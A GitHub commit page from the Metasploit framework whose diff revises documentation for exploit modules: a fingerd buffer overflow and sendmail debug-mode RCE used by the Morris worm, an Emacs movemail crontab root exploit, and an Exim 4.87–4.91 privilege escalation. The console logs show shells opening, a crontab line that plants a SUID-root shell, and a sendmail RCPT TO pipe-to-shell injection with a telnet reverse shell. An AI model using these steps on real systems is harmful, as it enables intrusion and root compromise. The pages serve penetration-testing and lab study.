Skip to content
Permalink
Browse files

Land #12889, Add OpenSMTPD MAIL FROM RCE

  • Loading branch information
adfoster-r7 committed Feb 7, 2020
2 parents 6b48337 + 8c07e17 commit 4dcb2fbd963580c85f604df1efd19c9f73e2d0de
@@ -1,10 +1,13 @@
## Introduction
## Vulnerable Application

### Description

This module exploits a stack buffer overflow in `fingerd` on 4.3BSD.

This vulnerability was exploited by the Morris worm in 1988-11-02.
Cliff Stoll reports on the worm in the epilogue of *The Cuckoo's Egg*.

## Setup
### Setup

A Docker environment for 4.3BSD on VAX is available at
<https://github.com/wvu/ye-olde-bsd>.
@@ -14,14 +17,18 @@ For manual setup, please follow the Computer History Wiki's
Garvin's [guide](http://plover.net/~agarvin/4.3bsd-on-simh.html) if
you're using [Quasijarus](http://gunkies.org/wiki/4.3_BSD_Quasijarus).

## Targets
### Targets

```
Id Name
-- ----
0 @(#)fingerd.c 5.1 (Berkeley) 6/6/85
```

## Verification Steps

Follow [Setup](#setup) and [Scenarios](#scenarios).

## Options

**RPORT**
@@ -31,46 +38,43 @@ port may be forwarded when NAT (SLiRP) is used in SIMH.

**PAYLOAD**

Set this to a BSD VAX payload. Currently only
Set this to a BSD VAX payload. Currently, only
`bsd/vax/shell_reverse_tcp` is supported.

## Usage
## Scenarios

### `fingerd` 5.1 on 4.3BSD

```
msf5 exploit(bsd/finger/morris_fingerd_bof) > options
msf5 > use exploit/bsd/finger/morris_fingerd_bof
msf5 exploit(bsd/finger/morris_fingerd_bof) > show missing
Module options (exploit/bsd/finger/morris_fingerd_bof):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS 127.0.0.1 yes The target address range or CIDR identifier
RPORT 79 yes The target port (TCP)
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
Payload options (bsd/vax/shell_reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.1.2 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 @(#)fingerd.c 5.1 (Berkeley) 6/6/85
LHOST yes The listen address (an interface may be specified)
msf5 exploit(bsd/finger/morris_fingerd_bof) > set rhosts 127.0.0.1
rhosts => 127.0.0.1
msf5 exploit(bsd/finger/morris_fingerd_bof) > set lhost 192.168.56.1
lhost => 192.168.56.1
msf5 exploit(bsd/finger/morris_fingerd_bof) > run
[*] Started reverse TCP handler on 192.168.1.2:4444
[*] Started reverse TCP handler on 192.168.56.1:4444
[*] 127.0.0.1:79 - Connecting to fingerd
[*] 127.0.0.1:79 - Sending 533-byte buffer
[*] Command shell session 1 opened (192.168.1.2:4444 -> 192.168.1.2:51992) at 2018-09-25 10:14:15 -0500
[*] Command shell session 1 opened (192.168.56.1:4444 -> 192.168.56.1:58015) at 2020-02-06 15:45:33 -0600
whoami
nobody
who am i
nobody tty?? Feb 6 13:45
cat /etc/motd
4.3 BSD UNIX #1: Fri Jun 6 19:55:29 PDT 1986
@@ -2,7 +2,7 @@

Exim 4.87 - 4.91 Local Privilege Escalation

This module exploits a flaw found in Exim versions 4.87 to 4.91 (inclusive). Improper validation of recipient address in deliver_message() function in /src/deliver.c may lead to command execution with root privileges (CVE-2019-10149).
This module exploits a flaw found in Exim versions 4.87 to 4.91 (inclusive). Improper validation of recipient address in deliver_message() function in /src/deliver.c may lead to command execution with root privileges (CVE-2019-10149).

Both meterpreter shell and classic shell are supported. The exploit will upload the specified `payload`, set the suid bit, and execute it to create a new root session. In order for the new session to be a root one, both `PrependSetuid` and `PrependSetgid` must be set to true (which is the default configuration for the exploit), and the `WritableDir` must be mounted without `nosuid`.

@@ -37,10 +37,10 @@ The port that exim is listening to. On most cases it will be port 25 (which is t
## ForceExploit

Force exploit even if the current session is root.

## SendExpectTimeout

Timeout per send/expect when communicating with exim.
## ExpectTimeout

Timeout for Expect when communicating with exim.

## WritableDir

@@ -54,9 +54,9 @@ A directory where we can write files (default is /tmp).
```
meterpreter > getuid
Server username: uid=1000, gid=1000, euid=1000, egid=1000
meterpreter >
Background session 1? [y/N]
msf5 exploit(multi/handler) > use exploit/linux/local/exim4_deliver_message_priv_esc
meterpreter >
Background session 1? [y/N]
msf5 exploit(multi/handler) > use exploit/linux/local/exim4_deliver_message_priv_esc
msf5 exploit(linux/local/exim4_deliver_message_priv_esc) > set session 1
session => 1
msf5 exploit(linux/local/exim4_deliver_message_priv_esc) > set lhost 192.168.0.50
@@ -71,7 +71,7 @@ msf5 exploit(linux/local/exim4_deliver_message_priv_esc) > check
[*] The target appears to be vulnerable.
msf5 exploit(linux/local/exim4_deliver_message_priv_esc) > exploit
[*] Started reverse TCP handler on 192.168.0.50:13371
[*] Started reverse TCP handler on 192.168.0.50:13371
[*] Payload sent, wait a few seconds...
[*] Sending stage (985320 bytes) to 192.168.0.80
[*] Meterpreter session 2 opened (192.168.0.50:13371 -> 192.168.0.80:45562) at 2019-07-07 23:46:37 +0100
@@ -1,10 +1,13 @@
## Introduction
## Vulnerable Application

### Description

This module exploits a SUID installation of the Emacs `movemail` utility
to run a command as root by writing to 4.3BSD's `/usr/lib/crontab.local`.

The vulnerability is documented in Cliff Stoll's book *The Cuckoo's Egg*.

## Setup
### Setup

A Docker environment for 4.3BSD on VAX is available at
<https://github.com/wvu/ye-olde-bsd>.
@@ -14,14 +17,18 @@ For manual setup, please follow the Computer History Wiki's
Garvin's [guide](http://plover.net/~agarvin/4.3bsd-on-simh.html) if
you're using [Quasijarus](http://gunkies.org/wiki/4.3_BSD_Quasijarus).

## Targets
### Targets

```
Id Name
-- ----
0 /usr/lib/crontab.local
```

## Verification Steps

Follow [Setup](#setup) and [Scenarios](#scenarios).

## Options

**MOVEMAIL**
@@ -34,28 +41,40 @@ If your payload is `cmd/unix/generic` (suggested default), set this to
the command you want to run as root. The provided default will create a
SUID-root shell at `/tmp/sh`.

## Usage
## Scenarios

### 4.3BSD

```
msf5 > use exploit/unix/local/emacs_movemail
msf5 exploit(unix/local/emacs_movemail) > show missing
Module options (exploit/unix/local/emacs_movemail):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION yes The session to run this module on.
Payload options (cmd/unix/generic):
Name Current Setting Required Description
---- --------------- -------- -----------
msf5 exploit(unix/local/emacs_movemail) > set session -1
session => -1
msf5 exploit(unix/local/emacs_movemail) > run
[*] Setting a sane $PATH: /bin:/usr/bin:/usr/ucb:/etc
[*] Current shell is /bin/sh
[-] Current shell is unknown
[*] $PATH is /bin:/usr/bin:/usr/ucb:/etc
[+] SUID-root [redacted] found
[+] SUID-root /etc/movemail found
[*] Preparing crontab with payload
* * * * * root cp /bin/sh /tmp && chmod u+s /tmp/sh
* * * * * root rm -f /usr/lib/crontab.local
[*] Creating writable /usr/lib/crontab.local
[+] Writing crontab to /usr/lib/crontab.local
[!] Please wait at least one minute for effect
[*] Exploit completed, but no session was created.
msf5 exploit(unix/local/emacs_movemail) > sessions -1
[*] Starting interaction with 1...
ls -l /usr/lib/crontab.local /tmp/sh
/usr/lib/crontab.local not found
-rwsr-xr-x 1 root 23552 Nov 22 15:17 /tmp/sh
/tmp/sh -c whoami
root
msf5 exploit(unix/local/emacs_movemail) >
```
@@ -1,12 +1,14 @@
## Introduction
## Vulnerable Application

### Description

This module exploits `sendmail`'s well-known historical debug mode to
escape to a shell and execute commands in the SMTP `RCPT TO` command.

This vulnerability was exploited by the Morris worm in 1988-11-02.
Cliff Stoll reports on the worm in the epilogue of *The Cuckoo's Egg*.

## Setup
### Setup

A Docker environment for 4.3BSD on VAX is available at
<https://github.com/wvu/ye-olde-bsd>.
@@ -16,14 +18,18 @@ For manual setup, please follow the Computer History Wiki's
Garvin's [guide](http://plover.net/~agarvin/4.3bsd-on-simh.html) if
you're using [Quasijarus](http://gunkies.org/wiki/4.3_BSD_Quasijarus).

## Targets
### Targets

```
Id Name
-- ----
0 @(#)version.c 5.51 (Berkeley) 5/2/86
```

## Verification Steps

Follow [Setup](#setup) and [Scenarios](#scenarios).

## Options

**RPORT**
@@ -33,62 +39,66 @@ port may be forwarded when NAT (SLiRP) is used in SIMH.

**PAYLOAD**

Set this to a Unix command payload. Currently only `cmd/unix/reverse`
Set this to a Unix command payload. Currently, only `cmd/unix/reverse`
and `cmd/unix/generic` are supported.

## Usage
## Scenarios

### `sendmail` 5.51 on 4.3BSD

```
msf5 exploit(unix/smtp/morris_sendmail_debug) > options
msf5 > use exploit/unix/smtp/morris_sendmail_debug
msf5 exploit(unix/smtp/morris_sendmail_debug) > show missing
Module options (exploit/unix/smtp/morris_sendmail_debug):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS 127.0.0.1 yes The target address range or CIDR identifier
RPORT 25 yes The target port (TCP)
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
Payload options (cmd/unix/reverse):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.1.5 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 @(#)version.c 5.51 (Berkeley) 5/2/86
LHOST yes The listen address (an interface may be specified)
msf5 exploit(unix/smtp/morris_sendmail_debug) > set rhosts 127.0.0.1
rhosts => 127.0.0.1
msf5 exploit(unix/smtp/morris_sendmail_debug) > set lhost 192.168.56.1
lhost => 192.168.56.1
msf5 exploit(unix/smtp/morris_sendmail_debug) > run
[*] Started reverse TCP double handler on 192.168.1.5:4444
[*] Started reverse TCP double handler on 192.168.56.1:4444
[*] 127.0.0.1:25 - Connecting to sendmail
[*] 127.0.0.1:25 - Enabling debug mode and sending exploit
[*] 127.0.0.1:25 - Expecting: /220.*Sendmail/
[*] 127.0.0.1:25 - Sending: DEBUG
[*] 127.0.0.1:25 - Sending: MAIL FROM:<GmWE2vWEViR4CLhBWOOOUVSMjJEr2NymDveA>
[*] 127.0.0.1:25 - Expecting: /200 Debug set/
[*] 127.0.0.1:25 - Sending: MAIL FROM:<3V900gQTSR70m6QPRYJnf3eoUIe6>
[*] 127.0.0.1:25 - Expecting: /250.*Sender ok/
[*] 127.0.0.1:25 - Sending: RCPT TO:<"| sed '1,/^$/d' | sh; exit 0">
[*] 127.0.0.1:25 - Expecting: /250.*Recipient ok/
[*] 127.0.0.1:25 - Sending: DATA
[*] 127.0.0.1:25 - Expecting: /354 Enter mail.*itself/
[*] 127.0.0.1:25 - Sending: PATH=/bin:/usr/bin:/usr/ucb:/etc
[*] 127.0.0.1:25 - Sending: export PATH
[*] 127.0.0.1:25 - Sending: sh -c '(sleep 4197|telnet 192.168.1.5 4444|while : ; do sh && break; done 2>&1|telnet 192.168.1.5 4444 >/dev/null 2>&1 &)'
[*] 127.0.0.1:25 - Sending: sh -c '(sleep 3935|telnet 192.168.56.1 4444|while : ; do sh && break; done 2>&1|telnet 192.168.56.1 4444 >/dev/null 2>&1 &)'
[*] 127.0.0.1:25 - Sending: .
[*] 127.0.0.1:25 - Expecting: /250 Ok/
[*] 127.0.0.1:25 - Sending: QUIT
[*] 127.0.0.1:25 - Expecting: /221.*closing connection/
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo zqhqKJD7trW0E0Lp;
[*] Command: echo ISj759F8jEik4HAW;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "zqhqKJD7trW0E0Lp\r\n"
[*] Reading from socket A
[*] A: "sh: Connected: not found\r\nsh: Escape: not found\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (192.168.1.5:4444 -> 192.168.1.5:64337) at 2018-10-20 14:08:03 -0500
[*] B is input...
[*] Command shell session 1 opened (192.168.56.1:4444 -> 192.168.56.1:58037) at 2020-02-06 15:51:28 -0600
[!] 127.0.0.1:25 - Do NOT type `exit', or else you may lose further shells!
[!] 127.0.0.1:25 - Hit ^C to abort the session instead, please and thank you

0 comments on commit 4dcb2fb

Please sign in to comment.
You can’t perform that action at this time.